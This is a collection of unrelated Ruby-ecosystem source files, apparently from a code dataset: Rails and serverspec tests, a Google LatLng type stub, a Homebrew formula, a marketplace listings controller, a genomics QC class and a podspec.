        expect(results_page).not_to have_suggested_searches
      end
    end
  end

  context 'a search with more than 3 results' do
    before do
      results_page_request(radius: 50, results_to_return: 10)
    end

    it 'shows no links' do
      filter_page.load
      filter_page.by_postcode_town_or_city.click
      filter_page.location_query.set 'SW1P 3BT'
      filter_page.find_courses.click

      expect(results_page).not_to have_suggested_search_links
    end
  end

  context 'a search filtered by provider with 2 results' do
    before do
      stub_providers(
        query: {
          'fields[providers]' => 'provider_code,provider_name',
          'search' => 'ACME',
        },
      )

      stub_courses(
        query: base_parameters.merge('filter[provider.provider_name]' => 'ACME SCITT 0'),
        course_count: 2,
      )
    end

    it "doesn't show suggested searches" do
      filter_page.load
      filter_page.by_provider.click
      filter_page.provider_search.fill_in(with: 'ACME')
      filter_page.find_courses.click

      expect(results_page).not_to have_suggested_search_links
    end
  end
end
31.58
97
0.710365
08bab594d6e31f42500f66b25843b6ba4bd956c3
2,841
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.


module Google
  module Type
    # An object representing a latitude/longitude pair. This is expressed as a pair
    # of doubles representing degrees latitude and degrees longitude. Unless
    # specified otherwise, this must conform to the
    # <a href="http://www.unoosa.org/pdf/icg/2012/template/WGS_84.pdf">WGS84
    # standard</a>. Values must be within normalized ranges.
    #
    # Example of normalization code in Python:
    #
    #     def NormalizeLongitude(longitude):
    #       """Wraps decimal degrees longitude to [-180.0, 180.0]."""
    #       q, r = divmod(longitude, 360.0)
    #       if r > 180.0 or (r == 180.0 and q <= -1.0):
    #         return r - 360.0
    #       return r
    #
    #     def NormalizeLatLng(latitude, longitude):
    #       """Wraps decimal degrees latitude and longitude to
    #       [-90.0, 90.0] and [-180.0, 180.0], respectively."""
    #       r = latitude % 360.0
    #       if r <= 90.0:
    #         return r, NormalizeLongitude(longitude)
    #       elif r >= 270.0:
    #         return r - 360, NormalizeLongitude(longitude)
    #       else:
    #         return 180 - r, NormalizeLongitude(longitude + 180.0)
    #
    #     assert 180.0 == NormalizeLongitude(180.0)
    #     assert -180.0 == NormalizeLongitude(-180.0)
    #     assert -179.0 == NormalizeLongitude(181.0)
    #     assert (0.0, 0.0) == NormalizeLatLng(360.0, 0.0)
    #     assert (0.0, 0.0) == NormalizeLatLng(-360.0, 0.0)
    #     assert (85.0, 180.0) == NormalizeLatLng(95.0, 0.0)
    #     assert (-85.0, -170.0) == NormalizeLatLng(-95.0, 10.0)
    #     assert (90.0, 10.0) == NormalizeLatLng(90.0, 10.0)
    #     assert (-90.0, -10.0) == NormalizeLatLng(-90.0, -10.0)
    #     assert (0.0, -170.0) == NormalizeLatLng(-180.0, 10.0)
    #     assert (0.0, -170.0) == NormalizeLatLng(180.0, 10.0)
    #     assert (-90.0, 10.0) == NormalizeLatLng(270.0, 10.0)
    #     assert (90.0, 10.0) == NormalizeLatLng(-270.0, 10.0)
    # @!attribute [rw] latitude
    #   @return [Float]
    #     The latitude in degrees. It must be in the range [-90.0, +90.0].
    # @!attribute [rw] longitude
    #   @return [Float]
    #     The longitude in degrees. It must be in the range [-180.0, +180.0].
    class LatLng; end
  end
end
43.707692
83
0.608589
8721bbd4938dcc16b4d42c060e857016702309b4
830
require 'spec_helper'

include SpecInfra::Helper::SmartOS

describe process("memcached") do
  let(:stdout) { " 1407\n" }
  its(:pid) { should eq 1407 }
  its(:command) { should eq "ps -C memcached -o pid= | head -1" }
end

describe process("memcached") do
  let(:stdout) { "/usr/bin/memcached -m 14386 -p 11211 -u nobody -l 10.11.1.53 -c 30000\n" }
  its(:args) { should match /-c 30000\b/ }
  its(:command) { should eq "ps -C memcached -o args= | head -1" }
end

describe process("memcached") do
  context "when running" do
    let(:stdout) { " 1407\n" }
    it { should be_running }
    its(:command) { should eq "ps -C memcached -o pid= | head -1" }
  end

  context "when not running" do
    let(:stdout) { " 1407\n" }
    it { should be_running }
    its(:command) { should eq "ps -C memcached -o pid= | head -1" }
  end
end
27.666667
92
0.625301
1d3792b89a59792004e40d1471200a9218eb4b7a
207
class ChangedTeamsAddedSuspendedUntil < ActiveRecord::Migration
  def self.up
    add_column :teams, :suspended_until, :datetime
  end

  def self.down
    remove_column :teams, :suspended_until
  end
end
20.7
63
0.758454
d5ba946072fab667a3a8c6f1d05f22c8b10056fb
1,166
class Rke < Formula
  desc "Rancher Kubernetes Engine, a Kubernetes installer that works everywhere"
  homepage "https://rancher.com/docs/rke/v0.1.x/en/"
  url "https://github.com/rancher/rke.git",
      :tag => "v0.1.11",
      :revision => "45d79aa3598a35196fbb4472e2e5eac86172cff5"

  bottle do
    cellar :any_skip_relocation
    sha256 "be1fced3aca5af994b7bdea1a4be26cf35dd3504faff7c6cb03ca6baa78ffd34" => :mojave
    sha256 "056f55ac6c5debf8a6bc9f40d0870a510609fd514fee5e57f682057cd270a1d5" => :high_sierra
    sha256 "069d35aa9bcdaebe8116a59e78c86a61291ae21c93d66d6003a24c11b9e309ca" => :sierra
    sha256 "4fedb9ebe7d7aeae26b450bfb3fb6213ab1aedc1caa272eb831e824dfbf097e5" => :x86_64_linux
  end

  depends_on "go" => :build

  def install
    ENV["GOPATH"] = buildpath
    (buildpath/"src/github.com/rancher/rke").install buildpath.children
    cd "src/github.com/rancher/rke" do
      system "go", "build", "-ldflags", "-w -X main.VERSION=v#{version}", "-o", bin/"rke"
      prefix.install_metafiles
    end
  end

  test do
    system bin/"rke", "config", "-e"
    assert_predicate testpath/"cluster.yml", :exist?
  end
end
33.314286
94
0.709262
b9d50d76e46ff3b8d9801bcc98a1dae7c4485e68
16,254
class ListingsController < ApplicationController
  include PeopleHelper

  # Skip auth token check as current jQuery doesn't provide it automatically
  skip_before_filter :verify_authenticity_token, :only => [:close, :update, :follow, :unfollow]

  before_filter :only => [ :edit, :update, :close, :follow, :unfollow ] do |controller|
    controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_this_content")
  end

  before_filter :only => [ :new, :create ] do |controller|
    controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_create_new_listing", :sign_up_link => view_context.link_to(t("layouts.notifications.create_one_here"), sign_up_path)).html_safe
  end

  before_filter :person_belongs_to_current_community, :only => [:index]
  before_filter :save_current_path, :only => :show
  before_filter :ensure_authorized_to_view, :only => [ :show, :follow, :unfollow ]

  before_filter :only => [ :close ] do |controller|
    controller.ensure_current_user_is_listing_author t("layouts.notifications.only_listing_author_can_close_a_listing")
  end

  before_filter :only => [ :edit, :update ] do |controller|
    controller.ensure_current_user_is_listing_author t("layouts.notifications.only_listing_author_can_edit_a_listing")
  end

  before_filter :ensure_is_admin, :only => [ :move_to_top, :show_in_updates_email ]

  before_filter :is_authorized_to_post, :only => [ :new, :create ]

  skip_filter :dashboard_only

  def index
    if params[:format] == "atom" # API request for feed
      redirect_to :controller => "Api::ListingsController", :action => :index
      return
    end

    @selected_tribe_navi_tab = "home"

    if request.xhr? && params[:person_id] # AJAX request to load on person's listings for profile view
      # Returns the listings for one person formatted for profile page view
      per_page = params[:per_page] || 200 # the point is to show all here by default
      page = params[:page] || 1
      render :partial => "listings/profile_listings", :locals => {:person => @person, :limit => per_page}
      return
    end

    redirect_to root
  end

  def checkout
    items = @current_user.current_cart.cart_items
    @cart_items = items
  end

  def invoice
  end

  def listing_bubble
    if params[:id]
      @listing = Listing.find(params[:id])
      if @listing.visible_to?(@current_user, @current_community)
        render :partial => "homepage/listing_bubble", :locals => { :listing => @listing }
      else
        render :partial => "bubble_listing_not_visible"
      end
    end
  end

  # Used to show multiple listings in one bubble
  def listing_bubble_multiple
    @listings = Listing.visible_to(@current_user, @current_community, params[:ids]).order("id DESC")
    if @listings.size > 0
      render :partial => "homepage/listing_bubble_multiple"
    else
      render :partial => "bubble_listing_not_visible"
    end
  end

  def show
    @selected_tribe_navi_tab = "home"

    unless current_user?(@listing.author)
      @listing.increment!(:times_viewed)
    end

    @current_image = if params[:image]
      @listing.image_by_id(params[:image])
    else
      @listing.listing_images.first
    end

    @prev_image_id, @next_image_id = if @current_image
      @listing.prev_and_next_image_ids_by_id(@current_image.id)
    else
      [nil, nil]
    end

    form_path = if @listing.transaction_type.preauthorize_payment?
      # TODO This is copy-paste
      if @listing.transaction_type.price_per.present?
        book_path(:listing_id => @listing.id.to_s)
      else
        if @current_community.paypal_enabled?
          initiate_order_path(:listing_id => @listing.id.to_s)
        else
          preauthorize_payment_path(:listing_id => @listing.id.to_s)
        end
      end
    else
      if @listing.status_after_reply == "free"
        reply_to_listing_path(:listing_id => @listing.id.to_s)
      else
        post_pay_listing_path(:listing_id => @listing.id.to_s)
      end
    end

    payment_gateway = MarketplaceService::Community::Query.payment_type(@current_community.id)

    render locals: {form_path: form_path, payment_gateway: payment_gateway}
  end

  def new
    @seller_commission_in_use = @current_community.commission_from_seller && @current_community.payments_in_use?
    @selected_tribe_navi_tab = "new_listing"
    @listing = Listing.new

    if (@current_user.location != nil)
      temp = @current_user.location
      temp.location_type = "origin_loc"
      @listing.build_origin_loc(temp.attributes)
    else
      @listing.build_origin_loc(:location_type => "origin_loc")
    end

    if request.xhr? # AJAX request to get the actual form contents
      @listing.category = @current_community.categories.find(params[:subcategory].blank? ? params[:category] : params[:subcategory])
      @custom_field_questions = @listing.category.custom_fields
      @numeric_field_ids = numeric_field_ids(@custom_field_questions)

      @listing.transaction_type = @current_community.transaction_types.find(params[:transaction_type])

      logger.info "Category: #{@listing.category.inspect}"

      payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id)

      payment_setup_missing, payment_setup_path =
        if payment_type == :braintree
          missing = PaymentRegistrationGuard.new(@current_community, @current_user, @listing).requires_registration_before_posting?
          [missing, payment_settings_path(@current_community.payment_gateway.gateway_type, @current_user)]
        elsif payment_type == :paypal
          missing = PaypalService::PaypalAccount::Query.personal_account(@current_user.id, @current_community.id).blank?
          [missing, new_paypal_account_settings_payment_path(@current_user.username)]
        else
          [false, nil]
        end

      if payment_setup_missing
        render :partial => "listings/payout_registration_before_posting", locals: {payment_settings_path: payment_setup_path }
      else
        render :partial => "listings/form/form_content", locals: {minimum_commission: minimum_commission}
      end
    else
      render locals: {minimum_commission: minimum_commission}
    end
  end

  def create
    if params[:listing][:origin_loc_attributes][:address].empty? || params[:listing][:origin_loc_attributes][:address].blank?
      params[:listing].delete("origin_loc_attributes")
    end

    params[:listing] = normalize_price_param(params[:listing]);

    @listing = Listing.new(params[:listing])
    @listing.author = @current_user
    @listing.custom_field_values = create_field_values(params[:custom_fields])

    if @listing.save
      listing_image_ids = params[:listing_images].collect { |h| h[:id] }.select { |id| id.present? }
      ListingImage.where(id: listing_image_ids, author_id: @current_user.id).update_all(listing_id: @listing.id)
    else
      redirect_to new_listing_path and return
    end

    if @listing.new_record?
      Rails.logger.error "Errors in creating listing: #{@listing.errors.full_messages.inspect}"
      flash[:error] = t("layouts.notifications.listing_could_not_be_saved", :contact_admin_link => view_context.link_to(t("layouts.notifications.contact_admin_link_text"), new_user_feedback_path, :class => "flash-error-link")).html_safe
      redirect_to new_listing_path
    else
      flash[:notice] = t("layouts.notifications.listing_created_successfully", :new_listing_link => view_context.link_to(t("layouts.notifications.create_new_listing"), new_listing_path)).html_safe
      Delayed::Job.enqueue(ListingCreatedJob.new(@listing.id, @current_community.id))
      if @current_community.follow_in_use?
        Delayed::Job.enqueue(NotifyFollowersJob.new(@listing.id, @current_community.id), :run_at => NotifyFollowersJob::DELAY.from_now)
      end
      redirect_to @listing, status: 303
    end
  end

  def edit
    @seller_commission_in_use = @current_community.commission_from_seller && @current_community.payments_in_use?
    @selected_tribe_navi_tab = "home"
    if !@listing.origin_loc
      @listing.build_origin_loc(:location_type => "origin_loc")
    end

    @custom_field_questions = @listing.category.custom_fields.find_all_by_community_id(@current_community.id)
    @numeric_field_ids = numeric_field_ids(@custom_field_questions)

    render locals: {minimum_commission: minimum_commission}
  end

  def update
    if (params[:listing][:origin] && (params[:listing][:origin_loc_attributes][:address].empty? || params[:listing][:origin].blank?))
      params[:listing].delete("origin_loc_attributes")
      if @listing.origin_loc
        @listing.origin_loc.delete
      end
    end

    @listing.custom_field_values = create_field_values(params[:custom_fields])

    params[:listing] = normalize_price_param(params[:listing]);

    if @listing.update_fields(params[:listing])
      @listing.location.update_attributes(params[:location]) if @listing.location
      flash[:notice] = t("layouts.notifications.listing_updated_successfully")
      Delayed::Job.enqueue(ListingUpdatedJob.new(@listing.id, @current_community.id))
      redirect_to @listing
    else
      Rails.logger.error "Errors in editing listing: #{@listing.errors.full_messages.inspect}"
      flash[:error] = t("layouts.notifications.listing_could_not_be_saved", :contact_admin_link => view_context.link_to(t("layouts.notifications.contact_admin_link_text"), new_user_feedback_path, :class => "flash-error-link")).html_safe
      redirect_to edit_listing_path(@listing)
    end
  end

  def close
    payment_gateway = MarketplaceService::Community::Query.payment_type(@current_community.id)

    @listing.update_attribute(:open, false)
    respond_to do |format|
      format.html { redirect_to @listing }
      format.js { render :layout => false, locals: {payment_gateway: payment_gateway} }
    end
  end

  def move_to_top
    @listing = @current_community.listings.find(params[:id])

    # Listings are sorted by `sort_date`, so change it to now.
    if @listing.update_attribute(:sort_date, Time.now)
      redirect_to homepage_index_path
    else
      flash[:warning] = "An error occured while trying to move the listing to the top of the homepage"
      Rails.logger.error "An error occured while trying to move the listing (id=#{Maybe(@listing).id.or_else('No id available')}) to the top of the homepage"
      redirect_to @listing
    end
  end

  def show_in_updates_email
    @listing = @current_community.listings.find(params[:id])

    # Listings are sorted by `created_at`, so change it to now.
    if @listing.update_attribute(:updates_email_at, Time.now)
      render :nothing => true, :status => 200
    else
      Rails.logger.error "An error occured while trying to move the listing (id=#{Maybe(@listing).id.or_else('No id available')}) to the top of the homepage"
      render :nothing => true, :status => 500
    end
  end

  #shows a random listing from current community
  def random
    open_listings_ids = Listing.currently_open.select("id").find_with(nil, @current_user, @current_community).all
    if open_listings_ids.empty?
      redirect_to root and return
      #render :action => :index and return
    end
    random_id = open_listings_ids[Kernel.rand(open_listings_ids.length)].id
    #redirect_to listing_path(random_id)
    @listing = Listing.find_by_id(random_id)
    render :action => :show
  end

  def ensure_current_user_is_listing_author(error_message)
    @listing = Listing.find(params[:id])
    return if current_user?(@listing.author) || @current_user.has_admin_rights_in?(@current_community)
    flash[:error] = error_message
    redirect_to @listing and return
  end

  def follow
    change_follow_status("follow")
  end

  def unfollow
    change_follow_status("unfollow")
  end

  def verification_required
  end

  private

  def minimum_commission
    payment_type = MarketplaceService::Community::Query.payment_type(@current_community.id)
    currency = @current_community.default_currency

    case payment_type
    when :paypal
      paypal_minimum_commissions_api.get(currency)
    else
      Money.new(0, currency)
    end
  end

  def paypal_minimum_commissions_api
    PaypalService::API::Api.minimum_commissions_api
  end

  # Ensure that only users with appropriate visibility settings can view the listing
  def ensure_authorized_to_view
    @listing = Listing.find(params[:id])

    unless @listing.visible_to?(@current_user, @current_community) || (@current_user && @current_user.has_admin_rights_in?(@current_community))
      if @listing.public?
        # This situation occurs when the user tries to access a listing
        # via a different community url.
        flash[:error] = t("layouts.notifications.this_content_is_not_available_in_this_community")
        redirect_to root and return
      elsif @current_user
        flash[:error] = t("layouts.notifications.you_are_not_authorized_to_view_this_content")
        redirect_to root and return
      else
        session[:return_to] = request.fullpath
        flash[:warning] = t("layouts.notifications.you_must_log_in_to_view_this_content")
        redirect_to login_path and return
      end
    end
  end

  def change_follow_status(status)
    status.eql?("follow") ?
      @current_user.follow(@listing) :
      @current_user.unfollow(@listing)

    respond_to do |format|
      format.html { redirect_to @listing }
      format.js { render :follow, :layout => false }
    end
  end

  def custom_field_value_factory(custom_field_id, answer_value)
    question = CustomField.find(custom_field_id)

    answer = question.with_type do |question_type|
      case question_type
      when :dropdown
        option_id = answer_value.to_i
        answer = DropdownFieldValue.new
        answer.custom_field_option_selections = [CustomFieldOptionSelection.new(:custom_field_value => answer, :custom_field_option_id => answer_value)]
        answer
      when :text
        answer = TextFieldValue.new
        answer.text_value = answer_value
        answer
      when :numeric
        answer = NumericFieldValue.new
        answer.numeric_value = ParamsService.parse_float(answer_value)
        answer
      when :checkbox
        answer = CheckboxFieldValue.new
        answer.custom_field_option_selections = answer_value.map { |value| CustomFieldOptionSelection.new(:custom_field_value => answer, :custom_field_option_id => value) }
        answer
      when :date_field
        answer = DateFieldValue.new
        answer.date_value = DateTime.new(answer_value["(1i)"].to_i,
                                         answer_value["(2i)"].to_i,
                                         answer_value["(3i)"].to_i)
        answer
      else
        throw "Unimplemented custom field answer for question #{question_type}"
      end
    end

    answer.question = question
    answer.save
    logger.info "Errors: #{answer.errors.full_messages.inspect}"
    return answer
  end

  def create_field_values(custom_field_params)
    custom_field_params ||= {}

    mapped_values = custom_field_params.map do |custom_field_id, answer_value|
      custom_field_value_factory(custom_field_id, answer_value) unless is_answer_value_blank(answer_value)
    end.compact

    logger.info "Mapped values: #{mapped_values.inspect}"

    return mapped_values
  end

  def is_answer_value_blank(value)
    if value.kind_of?(Hash)
      value["(3i)"].blank? || value["(2i)"].blank? || value["(1i)"].blank? # DateFieldValue check
    else
      value.blank?
    end
  end

  def is_authorized_to_post
    if @current_community.require_verification_to_post_listings?
      unless @current_user.has_admin_rights_in?(@current_community) || @current_community_membership.can_post_listings?
        redirect_to verification_required_listings_path
      end
    end
  end

  def numeric_field_ids(custom_fields)
    custom_fields.map do |custom_field|
      custom_field.with(:numeric) do
        custom_field.id
      end
    end.compact
  end

  def normalize_price_param(listing_params)
    if listing_params[:price] then
      listing_params.except(:price).merge(price_cents: MoneyUtil.parse_str_to_cents(listing_params[:price]))
    else
      listing_params
    end
  end
end
37.025057
236
0.715578
26baa1f3c3bc1d3c9293e566af6f9141a4bc11a4
4,979
# frozen_string_literal: true

require 'fileutils'
require 'pathname'
require_relative 'settings'
require_relative 'sample/vcf_collection'
require_relative 'sample/cram'
require_relative 'sample/fastqc_report'
require_relative 'report/render'

module JgaAnalysisQC
  class Sample
    TEMPLATE_PREFIX = 'report'
    FASTQC_DIRNAME = 'fastqc'

    # @return [String] sample name
    attr_reader :name

    # @return [dir]
    attr_reader :dir

    # @return [VcfCollection]
    attr_reader :vcf_collection

    # @return [Cram, nil]
    attr_reader :cram

    # @return [Array<FastqcReport>]
    attr_reader :fastqc_reports

    # @param name            [String]
    # @param dir             [Pathname]
    # @param vcf_collection  [VcfCollection]
    # @param cram            [Cram, nil]
    # @param fastqc_reports  [Array<FastqcReport>]
    def initialize(name, dir, vcf_collection, cram = nil, fastqc_reports: [])
      @name = name
      @dir = dir
      @vcf_collection = vcf_collection
      @cram = cram
      @fastqc_reports = fastqc_reports
    end

    # @param show_path [Boolean]
    # @param fastqc    [Boolean]
    def render(show_path: true, fastqc: false)
      Report::Render.run(
        TEMPLATE_PREFIX,
        @dir,
        binding,
        toc_nesting_level: Report::SAMPLE_TOC_NESTING_LEVEL
      )
    end

    class << self
      # @param result_dir  [Pathname]
      # @param sample_name [String]
      # @param fastqc      [Boolean]
      # @return [Sample]
      def parse(result_dir, sample_name, fastqc: false)
        sample_dir = result_dir / sample_name
        vcf_collection = read_vcf_collection(sample_dir, sample_name)
        cram = read_cram(sample_dir, sample_name)
        fastqc_reports = fastqc ? read_fastqc(result_dir, sample_dir, sample_name) : []
        Sample.new(sample_name, sample_dir, vcf_collection, cram, fastqc_reports: fastqc_reports)
      end

      private

      # @param sample_dir  [Pathname]
      # @param sample_name [String]
      # @return [VcfCollection]
      def read_vcf_collection(sample_dir, sample_name)
        vcfs = HAPLOTYPECALLER_REGIONS.filter_map do |chr_region|
          vcf_basename = "#{sample_name}.#{chr_region.id}.g.vcf.gz"
          vcf_path = sample_dir / vcf_basename
          next unless vcf_path.exist?

          bcftools_stats_path = sample_dir / "#{vcf_basename}.bcftools-stats"
          bcftools_stats = Vcf::BcftoolsStats.parse(chr_region, bcftools_stats_path)
          Vcf.new(vcf_path, chr_region, bcftools_stats)
        end
        VcfCollection.new(vcfs)
      end

      # @param sample_dir  [Pathname]
      # @param sample_name [String]
      # @return [Cram, nil]
      def read_cram(sample_dir, sample_name)
        cram_basename = "#{sample_name}.cram"
        cram_path = sample_dir / cram_basename
        return nil unless cram_path.exist?

        Cram.new(
          cram_path,
          Cram::SamtoolsIdxstats.parse(sample_dir / "#{cram_basename}.idxstats"),
          Cram::SamtoolsFlagstat.parse(sample_dir / "#{cram_basename}.flagstat"),
          read_picard_collect_wgs_metrics_collection(sample_dir, cram_basename),
          read_picard_collect_base_distribution_per_cycle(sample_dir, cram_basename)
        )
      end

      # @param result_dir  [Pathname]
      # @param sample_dir  [Pathname]
      # @param sample_name [String]
      # @return [Array<FastqcReport>]
      def read_fastqc(result_dir, sample_dir, sample_name)
        Dir[sample_dir / 'fastqc' / '*'].filter_map do |dir|
          dir = Pathname.new(dir)
          next unless dir.directory?

          read_id = dir.basename.to_s
          html_path = dir / "#{read_id}_fastqc.html"
          next unless html_path.exist?

          FastqcReport.new(read_id, html_path.relative_path_from(result_dir))
        end
      end

      # @param sample_dir    [Pathname]
      # @param cram_basename [String]
      # @return [Cram::PicardCollectWgsMetricsCollection]
      def read_picard_collect_wgs_metrics_collection(sample_dir, cram_basename)
        picard_collect_wgs_metrics = WGS_METRICS_REGIONS.filter_map do |chr_region|
          picard_collect_wgs_metrics_path = sample_dir / "#{cram_basename}.#{chr_region.id}.wgs_metrics"
          Cram::PicardCollectWgsMetrics.parse(picard_collect_wgs_metrics_path, chr_region)
        end
        Cram::PicardCollectWgsMetricsCollection.new(picard_collect_wgs_metrics)
      end

      # @param sample_dir    [Pathname]
      # @param cram_basename [String]
      # @return [Cram::PicardCollectBaseDistributionByCycle, nil]
      def read_picard_collect_base_distribution_per_cycle(sample_dir, cram_basename)
        chart_png_path = sample_dir / "#{cram_basename}.collect_base_dist_by_cycle.chart.png"
        return nil unless chart_png_path.exist?

        Cram::PicardCollectBaseDistributionByCycle.new(chart_png_path)
      end
    end
  end
end
34.10274
97
0.658365
1166a8cfa535d51ef671dadfc75468dbc53f38e4
986
#
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html.
# Run `pod lib lint flutter_mongo_stitch.podspec' to validate before publishing.
#
Pod::Spec.new do |s|
  s.name             = 'flutter_mongodb_realm'
  s.version          = '0.0.1'
  s.summary          = 'A new Flutter plugin.'
  s.description      = <<-DESC
A new Flutter plugin.
                       DESC
  s.homepage         = 'http://example.com'
  s.license          = { :file => '../LICENSE' }
  s.author           = { 'Your Company' => '[email protected]' }
  s.source           = { :path => '.' }
  s.source_files = 'Classes/**/*'
  s.dependency 'Flutter'
  s.platform = :ios, '11.0'

  # Flutter.framework does not contain a i386 slice. Only x86_64 simulators are supported.
  s.pod_target_xcconfig = { 'DEFINES_MODULE' => 'YES', 'VALID_ARCHS[sdk=iphonesimulator*]' => 'x86_64' }
  s.swift_version = '5.0'

  s.dependency 'StitchSDK', '= 6.4.0'
  s.dependency 'RealmSwift', '=10.1.4'
end
37.923077
104
0.602434